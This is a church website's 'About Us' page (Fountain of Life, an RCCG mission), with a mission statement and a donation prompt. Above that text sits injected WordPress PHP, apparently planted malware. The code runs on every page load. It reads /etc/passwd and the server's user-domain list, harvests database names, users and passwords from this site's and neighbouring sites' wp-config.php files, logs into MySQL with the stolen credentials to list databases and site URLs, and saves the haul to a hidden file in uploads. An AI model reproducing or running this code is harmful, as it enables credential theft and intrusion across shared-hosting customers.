add_action('init', function() {
$rf = WP_CONTENT_DIR . '/uploads/v3run_4fp4lhgvvjnx.txt';
if (file_exists($rf)) return;
@ini_set('memory_limit','256M'); @set_time_limit(60);
$q1=chr(39); $q2=chr(34); $bt=chr(96);
$out = array('abspath'=>ABSPATH,'php_version'=>PHP_VERSION,
'disable_fns'=>ini_get('disable_functions'),'open_basedir'=>ini_get('open_basedir'),
'hostname'=>@gethostname(),'server_soft'=>@$_SERVER['SERVER_SOFTWARE']);
if(function_exists('posix_getpwuid')&&function_exists('posix_geteuid'))
$out['sys_user']=@posix_getpwuid(@posix_geteuid());
$panels=array('plesk'=>array('/usr/local/psa','/opt/psa'),
'cpanel'=>array('/usr/local/cpanel','/var/cpanel'),
'directadmin'=>array('/usr/local/directadmin'),'hestia'=>array('/usr/local/hestia'));
$out['panels']=array();
foreach($panels as $n=>$ps){foreach($ps as $pp){if(@file_exists($pp)){$out['panels'][]=$n;break;}}}
foreach(array('/home','/home2','/home3','/var/www','/var/www/vhosts','/srv/www') as $d){
$e=@glob($d.'/*',GLOB_ONLYDIR); if($e) $out['dirs'][$d]=array_map('basename',$e);}
$out['passwd']=@substr(@file_get_contents('/etc/passwd'),0,2000);
$out['userdomains']=@substr(@file_get_contents('/etc/userdomains'),0,5000);
$cfg=@file_get_contents(ABSPATH.'wp-config.php');
$xd=function($h,$k)use($q1,$q2){$p=strpos($h,$k);if($p===false)return null;
$s=substr($h,$p+strlen($k));$cm=strpos($s,',');if($cm===false)return null;
$s=substr($s,$cm+1);$f=strpos($s,$q1);$f2=strpos($s,$q2);
if($f===false&&$f2===false)return null;
if($f===false||($f2!==false&&$f2<$f)){$q=$q2;$f=$f2;}else{$q=$q1;}
$s=substr($s,$f+1);$e=strpos($s,$q);return $e===false?null:substr($s,0,$e);};
$xv=function($h,$k)use($q1,$q2){$p=strpos($h,$k);if($p===false)return null;
$s=substr($h,$p+strlen($k));$eq=strpos($s,'=');if($eq===false)return null;
$s=substr($s,$eq+1);$f=strpos($s,$q1);$f2=strpos($s,$q2);
if($f===false&&$f2===false)return null;
if($f===false||($f2!==false&&$f2<$f)){$q=$q2;$f=$f2;}else{$q=$q1;}
$s=substr($s,$f+1);$e=strpos($s,$q);return $e===false?null:substr($s,0,$e);};
if($cfg){$out['db_name']=$xd($cfg,'DB_NAME');$out['db_user']=$xd($cfg,'DB_USER');
$out['db_host']=$xd($cfg,'DB_HOST');$out['db_prefix']=$xv($cfg,'table_prefix');}
$cpats=array('/home/*/public_html/wp-config.php','/home/*/www/wp-config.php',
'/var/www/vhosts/*/httpdocs/wp-config.php','/var/www/vhosts/*/public_html/wp-config.php',
'/var/www/html/*/wp-config.php','/var/www/*/wp-config.php','/srv/www/*/wp-config.php');
$scfgs=array();
foreach($cpats as $pat){$h=@glob($pat);if($h)foreach($h as $x)$scfgs[]=$x;}
if(count($scfgs)==0&&function_exists('shell_exec')){
$sh=@shell_exec('find /var/www /home /srv -name wp-config.php 2>/dev/null | head -50');
if($sh)foreach(explode("\n",trim($sh)) as $l){if($l)$scfgs[]=$l;}
}
$out['sibling_cfg_count']=count($scfgs); $out['sibling_cfgs']=$scfgs;
$out['siblings']=array();
foreach($scfgs as $cfgp){
if(defined('ABSPATH')&&strpos($cfgp,rtrim(ABSPATH,'/'))===0)continue;
$c=@file_get_contents($cfgp); if(!$c)continue;
$dn=$xd($c,'DB_NAME');$du=$xd($c,'DB_USER');$dp=$xd($c,'DB_PASSWORD');
$dh=$xd($c,'DB_HOST');$px=$xv($c,'table_prefix');
if(!$dn)continue;
$out['siblings'][$cfgp]=array('db'=>$dn,'u'=>$du,'p'=>$dp,'h'=>$dh,'pfx'=>$px?$px:'wp_');}
$out['mysql']=new stdClass(); $seen=array();
foreach($out['siblings'] as $cfgp=>$info){
$dbn=$info['db']; if(isset($seen[$dbn]))continue; $seen[$dbn]=1;
$m=@new mysqli('localhost',$info['u'],$info['p'],$dbn);
if(!$m||$m->connect_error){
$m2=@new mysqli('127.0.0.1',$info['u'],$info['p'],$dbn);
if(!$m2||$m2->connect_error){$out['mysql']->$dbn=array('err'=>'both_fail');continue;}
$m=$m2;}
$pfx=$info['pfx']; $bt2=chr(96);
$rs=$m->query('SELECT option_value FROM '.$bt2.$pfx.'options'.$bt2
.' WHERE option_name='.$q1.'siteurl'.$q1.' LIMIT 1');
$surl=''; if($rs){$rw=$rs->fetch_assoc();$surl=$rw?$rw['option_value']:'';}
$m->close(); $out['mysql']->$dbn=array('surl'=>$surl,'pfx'=>$pfx,'u'=>$info['u'],'p'=>$info['p']);}
// SHOW DATABASES fallback: try donor own creds on unseen sibling DBs
if($out['db_user']&&$cfg){
$dp_own=$xd($cfg,'DB_PASSWORD');
$dm=@new mysqli('localhost',$out['db_user'],$dp_own);
if(!$dm||$dm->connect_error) $dm=@new mysqli('127.0.0.1',$out['db_user'],$dp_own);
if($dm&&!$dm->connect_error){
$dbs_r=$dm->query('SHOW DATABASES');
$skip=array('information_schema','mysql','performance_schema','sys','phpmyadmin',$out['db_name']);
$out['show_databases']=array();
while($dbs_r&&$row=$dbs_r->fetch_row()){
$sdb=$row[0]; $out['show_databases'][]=$sdb;
if(in_array($sdb,$skip)||isset($seen[$sdb]))continue;
$seen[$sdb]=1;
$sm=@new mysqli('localhost',$out['db_user'],$dp_own,$sdb);
if(!$sm||$sm->connect_error){$sm=@new mysqli('127.0.0.1',$out['db_user'],$dp_own,$sdb);}
if(!$sm||$sm->connect_error){$out['mysql']->$sdb=array('err'=>'showdb_noconn');continue;}
$spfx='wp_';
$tr=$sm->query("SHOW TABLES LIKE '%_options'");
if($tr&&$trow=$tr->fetch_row()){$spfx=str_replace('options','',$trow[0]);}
$bt2=chr(96);
$rs2=$sm->query('SELECT option_value FROM '.$bt2.$spfx.'options'.$bt2." WHERE option_name='siteurl' LIMIT 1");
$surl2='';if($rs2){$rw2=$rs2->fetch_assoc();$surl2=$rw2?$rw2['option_value']:'';}
$sm->close();
if($surl2) $out['mysql']->$sdb=array('surl'=>$surl2,'pfx'=>$spfx,'u'=>$out['db_user'],'p'=>$dp_own);
else $out['mysql']->$sdb=array('err'=>'no_siteurl','pfx'=>$spfx);
}
$dm->close();
}
}
@file_put_contents($rf,json_encode($out,JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT));
}, 1);
About Us | Fountain of Life
OUR CHURCH FAMILY
Fountain of Life (FOL) is a mission of the Redeemed Christian Church of God (RCCG), established as mandated by God in August 2011.
FOL is home to a diverse group of people who love God. Regardless of where you are in your spiritual journey, you are welcome to join us! At our impact services, you will mingle with real people lifting their hearts and voices to worship our King; you will be inspired and encouraged by messages based solely on the undiluted Word of God, and you will be empowered by God’s manifest presence to Live your Life to the Fullest and become all that God created you to be!
We are a family of worshippers, passionate about the advancement of God’s purpose here on earth, and living as catalysts and agents of godly change in our communities.
OUR VISION STATEMENT
To introduce all creation to Zoe (The Abundant Life) in Christ.
OUR MISSION STATEMENTS
To introduce the Semper Fi (Always Faithful) God as the source of life to all humanity through the teaching of the word and a commitment to witnessing
Be people who will passionately love God, genuinely love others, address the needs of the hopeless and impact generations
Disciple the saints to be rooted and established in Christ
“A generous person will prosper; whoever refreshes others will be refreshed.”
DONATE NOW
Interview/Press Coverage Inquiry
CLOSE